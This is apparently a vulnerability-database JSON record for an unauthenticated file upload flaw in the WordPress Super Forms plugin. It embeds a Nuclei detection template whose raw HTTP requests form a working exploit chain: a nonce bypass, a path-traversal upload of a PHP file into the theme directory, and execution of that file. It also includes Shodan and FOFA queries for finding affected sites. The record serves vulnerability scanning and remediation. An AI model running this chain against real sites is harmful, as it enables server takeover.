{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2026-14894/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2026-14894/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2026-14894/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2026-14894/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2026-14894/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2026-14894"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2026-14894"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2026/CVE-2026-14894.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2026-14894\n\ninfo:\n  name: WordPress Super Forms <= 6.3.313 - Arbitrary File Upload\n  author: pdteam,0x_Akoko\n  severity: critical\n  description: |\n    Super Forms – Drag & Drop Form Builder WordPress plugin \\u003C= 6.3.313 contains an arbitrary file upload vulnerability caused by missing file type validation and lack of capability checks in submit_form nopriv AJAX handler, letting unauthenticated attackers upload executable files and achieve remote code execution, exploit requires no authentication due to nonce bypass.\n  impact: |\n    Unauthenticated attackers can upload executable files and execute arbitrary code remotely, potentially compromising the entire server.\n  remediation: |\n    Update to the latest version of Super Forms – Drag & Drop Form Builder plugin.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9c7fb16-efbb-41e9-be13-98e96c1e9100\n    - https://patchstack.com/database/wordpress/plugin/super-forms/vulnerability/wordpress-super-forms-drag-drop-form-builder-plugin-6-3-313-unauthenticated-arbitrary-file-upload-vulnerability\n    - https://github.com/shinthink/CVE-2026-14894\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-14894\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-14894\n    epss-score: 0.05265\n    epss-percentile: 0.92192\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: developer-developer\n    product: super-forms\n    framework: wordpress\n    fofa-query: body=\"wp-content/plugins/super-forms\"\n    shodan-query: http.html:\"wp-content/plugins/super-forms\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,file-upload,rce,intrusive,vkev\n\nvariables:\n  rand: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: word\n        words:\n          - \"/wp-content/themes\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: wptheme\n        group: 1\n        regex:\n          - 'wp-content/themes/([a-zA-Z0-9_-]+)/'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php?action=super_create_nonce HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=super_create_nonce\n\n    extractors:\n      - type: regex\n        part: body\n        name: sfnonce\n        regex:\n          - '([a-f0-9]{10,})'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php?action=super_submit_form HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        sf_nonce={{sfnonce}}&form_id=1&data=%7B%22sf_upload_field%22%3A%7B%22type%22%3A%22files%22%2C%22files%22%3A%5B%7B%22value%22%3A%22../../../../../themes/{{wptheme}}/{{rand}}.php%22%2C%22datauristring%22%3A%22data%3Aimage/png%3Bbase64%2CPD9waHAgZWNobyAnQ1ZFLTIwMjYtMTQ4OTQtc2ZyY2UnOyBkaWUoKTsgPz4%3D%22%2C%22name%22%3A%22{{rand}}.php%22%2C%22label%22%3A%22attachment%22%7D%5D%7D%7D\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 302'\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-content/themes/{{wptheme}}/{{rand}}.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"CVE-2026-14894-sfrce\")'\n        condition: and\n# digest: 4a0a00473045022100ef1f0adff5190657bd292baabb99c767a9497ea980059c6a1e17b305d82d5737022020e0c9afdf67ab3c1540dc50b0c0b3ad5e0f760a6c3d32613a7f02d4606c2815:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2026-14894"
}